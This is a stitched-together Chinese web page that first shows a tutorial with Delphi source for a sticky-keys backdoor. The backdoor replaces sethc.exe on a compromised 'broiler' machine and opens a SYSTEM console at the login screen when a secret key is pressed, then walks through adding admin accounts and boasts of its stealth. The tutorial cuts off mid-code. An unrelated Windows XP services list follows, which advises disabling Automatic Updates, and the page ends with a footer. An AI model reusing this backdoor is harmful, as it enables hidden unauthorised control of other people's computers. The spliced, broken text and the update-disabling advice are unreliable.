篇一:编程实现粘滞键后门
编程实现粘滞键后门
所在栏目:网络安全 时间:04-13 10:22 分享:242次
实际上,在编程中将此网络安全后门称作粘滞键后门是不准确的,因为不只是粘滞键要调用C:\WINDOWS\system32\sethc.exe,连续按下右边shift持续8秒,也会调用这个程序,只不过实现的是“筛选键”。关于本文的思路,我先简单概括一下。
由于前人只是用cmd.exe覆盖sethc.exe,所以会带来两个问题:一是管理员调用粘滞键时会出现不和谐的cmd黑框;二是其他恶意的人也会发现这个谁都可以调用的后门。《无敌的粘滞键后门》一文给出了一种在调用cmd.exe之前先验证的方法,但是管理员会常用到cmd.exe程序,显然很容易被发现。因此,我们不妨编写一个实现某个功能的程序来覆盖C:\WINDOWS\system32\sethc.exe,并把真正的sethc.exe存在其他地方已备将来调用。这样做的优点不言而喻,首先当遇到正常的粘滞键或是筛选键调用时,该程序会调用真正的sethc.exe,丝毫不会有什么异样;其次,只有按下实事先约定好的键才会触发后门,其他人无法利用此后门。这样,一个完美的后门就形成了。程序实现框图如图1所示。 图1
sethc.exe的参数问题
我发现当双击sethc.exe文件时,并没有跳出“粘滞键”对话框,左思右想,猜想可能
是当我们连续按下5次shift时,系统不但运行了sethc.exe,而且还传递了参数。而当我双击sethc.exe时并没有传递参数,所以也就没什么反应了。为了得到这个参数,我用Delphi编了个简单的程序,代码如下。
program a;
uses
Dialogs,Windows;
begin
showmessage(ParamStr(1));
//将接收到的第一个参数显示在对话框上
end.
这段代码实现的功能很简单,就是把执行它的参数显示出来,用这个程序覆盖sethc.exe,然后连续5次按下shift,跳出对话框,参数是211,如图2所示,这验证了我的想法。按下右边的shift持续8秒,跳出如下对话框,参数是221,如图3所示。
图2
图3
如果在cmd下输入“sethc 211”,就会跳出“粘滞键”对话框,这也验证了参数的正确性。当我们要编后门时,只需把接收到的参数原封不动地传递给备份的真正的sethc文件就可以了。
编程实现
有了上面的基础,现在我们可以编程实现后门的功能了,具体代码如下。
program nz;
uses
Windows, SysUtils, WinSvc;
var
i:integer;
begin
Winexec(PChar('C:\WINDOWS\system32\dllcache\sethc1.exe ' + ParamStr(1)), SW_show);
//将后门接收到的参数传递给sethc.exe的备份
C:\WINDOWS\system32\dllcache\sethc1.exe,这样就能实现系统的正常功能了
i:=30;
while i>0 do
begin
i:=i-1;//i这个循环的条件是为了保证不是个死循环
Sleep(100);//暂停100毫秒
if GetKeyState(82) <> 0 then//比较r键的状态,82是 r的ASCII码
begin
i:=30;
while i>0 do
begin
i:=i-1;
Sleep(100); //暂停100毫秒
if GetKeyState(82) = 0 then//第二次比较r键的状态
begin
Winexec(PChar('mmc'), SW_show);//运行命令控制台,实现后门功能
Exit;
end;
end;
end;
end;
end.
关于GetKeyState函数,这里向大家解释一下。使用这个函数时需要把键盘上的按键看成一个开关,按一下为开,再按一下为关。触发后门的条件是GetKeyState的结果有所变化,比如我这里就要求GetKeyState(82)的结果先不等于0,之后等于0。如果你的r键的初始状态是不等于0的,你只需按一下r就会触发后门,反之,则需要按两下。我这里设计成了有限循环,如果在几秒内没有触发后门的达成条件,则退出。
这个后门的使用方法很简单,将肉鸡的C:\WINDOWS\system32\dllcache\sethc.exe重命名为sethc1.exe,并用后门覆盖C:\WINDOWS\system32\sethc.exe,之后在登录界面连续按下5次shift键,就会跳出粘滞键对话框,然后在几秒之内按下两次“r”,命令控制台就跳出来了,如图4所示。这时的命令控制台是System权限,可以进行任何操作。可能有些朋友对它不太熟悉,下面我就简单地介绍一下。
图4
首先,在命令控制台上选择“文件->添加删除管理单元”,在之后的窗口中选择“添加”,然后就可以选择要添加的管理单元了,如图5所示。我们选择“本地用户和组”,点击“添加”,选择默认的“本地计算机”即可,之后点击“完成”。然后将之前的对话框一个点“关闭”,一个点“确定”,就成功地添加了“本地用户和组”,大家就可以添加管理员账户了,
如图6所示。
图5
为了方便大家使用,我编写了一款生成器,大家可以从“r”、“e”、“n”、“y”、“u”、“j”、“i”选择一个字母作为后门的触发按键,如图7所示。
图7
大家可能会问,为什么运行的是控制台而不是cmd呢?这是因为我发现运行cmd会导致出错,无奈之下只好运行控制台了,至于具体原因还需要高手来解答。
与现在网上到处都是的木马、后门不同,本后门不用加载在注册表、系统服务等地方,所以要隐蔽很多;而且后门不是随系统启动而启动,所以就减少了被发现的可能。只有当调用系统热键时,才会运行后门。如果不按下事先约定的键,后门所实现的就是正常的系统功能,这就做到了神不知鬼不觉。
一个有趣的发现
如果把代码改成下面这样,也就是后门实现的功能是运行explorer.exe,会怎么样呢?
program nz;
uses
Windows, SysUtils, WinSvc;
篇二:电脑后台服务
【共享】XP的后台服务详细说明!
XP在后台默认运行很多服务,可我们能用的到的有几个? 要知道后台的服务可不是省油的灯,是会占用内存的哦.所以关闭没必要的服务是很重要的.开始-运行-services.msc-
可要怎么关呢!
不知道大家是不是清楚!
我找了一个帖子看大家能不能用上!
--------------------
Alerter
微软: 通知选取的使用者及计算机系统管理警示。如果停止这个服务,使用系统管理警示的程序将不会收到通知。如果停用这个服务,所有依存于它的服务将无法启动。
补充: 一般家用计算机根本不需要传送或接收计算机系统管理来的警示(Administrative Alerts),除非你的计算机用在局域网络上
依存: Workstation
建议: 已停用
Application Layer Gateway Service
微软: 提供因特网联机共享和因特网联机防火墙的第三方通讯协议插件的支持
补充: 如果你不使用因特网联机共享 (ICS) 提供多台计算机的因特网存取和因特网联机防火墙 (ICF) 软件你可以关掉
依存: Internt Connection Firewall (ICF) / Internet Connection Sharing (ICS)
建议: 已停用
Application Management (应用程序管理)
微软: 提供指派、发行、以及移除的软件安装服务。
补充: 如上说的软件安装变更的服务
建议: 手动
Automatic Updates
微软: 启用重要 Windows 更新的下载及安装。如果停用此服务,可以手动的从 Windows Update 网站上更新操作系统。
补充: 允许 Windows 于背景自动联机之下,到 Microsoft Servers 自动检查和下载更新修补程序
建议: 已停用
Background Intelligent Transfer Service
微软: 使用闲置的网络频宽来传输数据。
补充: 经由 Via HTTP1.1 在背景传输资料的.例如 Windows Update 就是以此为工作之一 依存: Remote Procedure Call (RPC) 和 Workstation
建议: 已停用
ClipBook (剪贴簿)
微软: 启用剪贴簿检视器以储存信息并与远程计算机共享。如果这个服务被停止,剪贴簿
检视器将无法与远程计算机共享信息。如果这个服务被停用,任何明确依存于它的服务将无法启动。
补充: 把剪贴簿内的信息和其它台计算机分享,一般家用计算机根本用不到
依存: Network DDE
建议: 已停用
COM+ Event System (COM+ 事件系统)
微软: 支持「系统事件通知服务 (SENS)」,它可让事件自动分散到订阅的 COM 组件。如果服务被停止,SENS 会关闭,并无法提供登入及注销通知。如果此服务被停用,任何明显依存它的服务都无法启动。
补充: 有些程序可能用到 COM+ 组件,像 BootVis 的 optimize system 应用,如事件检视器内显示的 DCOM 没有启用
依存: Remote Procedure Call (RPC) 和 System Event Notification
建议: 手动
COM+ System Application
微软: 管理 COM+ 组件的设定及追踪。如果停止此服务,大部分的 COM+ 组件将无法适当?#092;作。如果此服务被停用,任何明确依存它的服务将无法启动。
补充: 如果 COM+ Event System 是一台车,那么 COM+ System Application 就是司机,如事件检视器内显示的 DCOM 没有启用
依存: Remote Procedure Call (RPC)
建议: 手动
Computer Browser (计算机浏览器)
微软: 维护网络上更新的计算机清单,并将这个清单提供给做为浏览器的计算机。如果停止这个服务,这个清单将不会被更新或维护。如果停用这个服务,所有依存于它的服务将无法启动。
补充: 一般家庭用计算机不需要,除非你的计算机应用在区网之上,不过在大型的区网上有必要开这个拖慢速度吗?
依存: Server 和 Workstation
建议: 已停用
Cryptographic Services
微软: 提供三个管理服务: 确认 Windows 档案签章的 [类别目录数据库服务]; 从这个计算机新增及移除受信任根凭证授权凭证的 [受保护的根目录服务]; 以及协助注册这个计算机以取得凭证的 [金钥服务]。如果这个服务被停止,这些管理服务将无法正确工作。如果这个服务被停用,任何明确依存于它的服务将无法启动。
补充: 简单的说就是 Windows Hardware Quality Lab (WHQL)微软的一种认证,如果你有使用 Automatic Updates ,那你可能需要这个
依存: Remote Procedure Call (RPC)
建议: 手动
DHCP Client (DHCP 客户端)
微软: 透过登录及更新 IP 地址和 DNS 名称来管理网络设定。
补充: 使用 DSL/Cable 、ICS 和 IPSEC 的人都需要这个来指定动态 IP
依存: AFD 网络支持环境、NetBT、SYMTDI、TCP/IP Protocol Driver 和 NetBios over TCP/IP 建议: 手动
Distributed Link Tracking Client (分布式连结追踪客户端)
微软: 维护计算机中或网络网域不同计算机中 NTFS 档案间的连结。
补充: 维护区网内不同计算机之间的档案连结
依存: Remote Procedure Call (RPC)
建议: 已停用
Distributed Transaction Coordinator (分布式交易协调器)
微软: 协调跨越多个资源管理员的交易,比如数据库、讯息队列及档案系统。如果此服务被停止,这些交易将不会发生。如果服务被停用,任何明显依存它的服务将无法启动。 补充: 如上所说的,一般家庭用计算机用不太到,除非你启用的 Message Queuing 依存: Remote Procedure Call (RPC) 和 Security Accounts Manager
建议: 已停用
DNS Client (DNS 客户端)
微软: 解析并快取这台计算机的网域名称系统 (DNS) 名称。如果停止这个服务,这台计算机将无法解析 DNS 名称并寻找 Active Directory 网域控制站的位置。如果停用这个服务,所有依存于它的服务将无法启动。
补充: 如上所说的,另外 IPSEC 需要用到
依存: TCP/IP Protocol Driver
建议: 手动
Error Reporting Service
微软: 允许对执行于非标准环境中的服务和应用程序的错误报告。
补充: 微软的应用程序错误报告
依存: Remote Procedure Call (RPC)
建议: 已停用
Event Log (事件记录文件)
微软: 启用 Windows 为主的程序和组件所发出的事件讯息可以在事件检视器中检视。这个服务不能被停止。
补充: 允许事件讯息显示在事件检视器之上
依存: Windows Management Instrumentation
建议: 自动
Fast User Switching Compatibility
微软: 在多使用者环境下提供应用程序管理。
补充: 另外像是注销画面中的切换使用者功能
依存: Terminal Services
建议: 手动
Help and Support
微软: 让说明及支持中心能够在这台计算机上执行。如果这个服务停止,将无法使用说明及支持中心。如果这个服务被停用,它的所有依存服务将无法启动。
补充: 如果不使用就关了吧
依存: Remote Procedure Call (RPC)
建议: 已停用
Human Interface Device Access
微软: 启用对人性化接口装置 (HID) 的通用输入存取,HID 装置启动并维护对这个键盘、远程控制、以及其它多媒体装置上事先定义的快捷纽的使用。如果这个服务被停止,这个服务控制的快捷纽将不再起作用。如果这个服务被停用,任何明确依存于它的服务将无法启动。 补充: 如上所提到的
依存: Remote Procedure Call (RPC)
建议: 已停用
IMAPI CD-Burning COM Service
微软: 使用 Image Mastering Applications Programming Interface (IMAPI) 来管理光盘录制。如果这个服务被停止,这个计算机将无法录制光盘。如果这个服务被停用,任何明确地依赖它的服务将无法启动。
补充: XP 整合的 CD-R 和 CD-RW 光驱上拖放的烧录功能,可惜比不上烧录软件,关掉还可以加快 Nero 的开启速度
建议: 已停用
Indexing Service (索引服务)
微软: 本机和远程计算机的索引内容和档案属性; 透过弹性的查询语言提供快速档案存取。 补充: 简单的说可以让你加快搜查速度,不过我想应该很少人和远程计算机作搜寻吧 依存: Remote Procedure Call (RPC)
建议: 已停用
Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
微软: 为您的家用网络或小型办公室网络提供网络地址转译、寻址及名称解析服务和/或防止干扰的服务。
补充: 如果你不使用因特网联机共享(ICS)或是 XP 内含的因特网联机防火墙(ICF)你可以关掉
依存: Application Layer Gateway Service、Network Connections、Network Location Awareness(NLA)、Remote Access Connection Manager
建议: 已停用
IPSEC Services (IP 安全性服务)
微软: 管理 IP 安全性原则并启动 ISAKMP/Oakley (IKE) 及 IP 安全性驱动程序。
补充: 协助保护经由网络传送的数据。IPSec 为一重要环节,为虚拟私人网络 (VPN) 中提供安全性,而 VPN 允许组织经由因特网安全地传输数据。在某些网域上也许需要,但是一般使用者大部分是不太需要的
依存: IPSEC driver、Remote Procedure Call (RPC)、TCP/IP Protocol Driver
建议: 手动
Logical Disk Manager (逻辑磁盘管理员)
微软: 侦测及监视新硬盘磁盘,以及传送磁盘区信息到逻辑磁盘管理系统管理服务以供设定。如果这个服务被停止,动态磁盘状态和设定信息可能会过时。如果这个服务被停用,任何明确依存于它的服务将无法启动。
补充: 磁盘管理员用来动态管理磁盘,如显示磁盘可用空间等和使用 Microsoft Management Console(MMC)主控台的功能
依存: Plug and Play、Remote Procedure Call (RPC)、Logical Disk Manager Administrative Service
建议: 自动
Logical Disk Manager Administrative Service (逻辑磁盘管理员系统管理服务)
微软: 设定硬盘磁盘及磁盘区,服务只执行设定程序然后就停止。
补充: 使用 Microsoft Management Console(MMC)主控台的功能时才用到
依存: Plug and Play、Remote Procedure Call (RPC)、Logical Disk Manager
建议: 手动
Messenger (信差)
微软: 在客户端及服务器之间传输网络传送及 [Alerter] 服务讯息。这个服务与 Windows Messenger 无关。如果停止这个服务,Alerter 讯息将不会被传输。如果停用这个服务,所有依存于它的服务将无法启动。
补充: 允许网络之间互相传送提示讯息的功能,如 net send 功能,如不想被骚扰话可关了 依存: NetBIOS Interface、Plug and Play、Remote Procedure Call (RPC)、Workstation 建议: 已停用
MS Software Shadow Copy Provider
微软: 管理磁盘区阴影复制服务所取得的以软件为主的磁盘区阴影复制。如果停止这个服务,就无法管理以软件为主的磁盘区阴影复制。如果停用这个服务,任何明确依存于它的服务将无法启动。
补充: 如上所说的,用来备份的?#124;西,如 MS Backup 程序就需要这个服务
依存: Remote Procedure Call (RPC)
建议: 已停用
Net Logon
微软: 支持网域上计算机的账户登入事件的 pass-through 验证。
补充: 一般家用计算机不太可能去用到登入网域审查这个服务
依存: Workstation
建议: 已停用
NetMeeting Remote Desktop Sharing (NetMeeting 远程桌面共享)
微软: 让经过授权的使用者可以使用 NetMeeting 透过公司近端内部网络,由远程访问这部计算机。如果这项服务停止的话,远程桌面共享功能将无法使用。如果服务停用的话,任何依赖它的服务将无法启动。
篇三:单管道后门程序实现
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有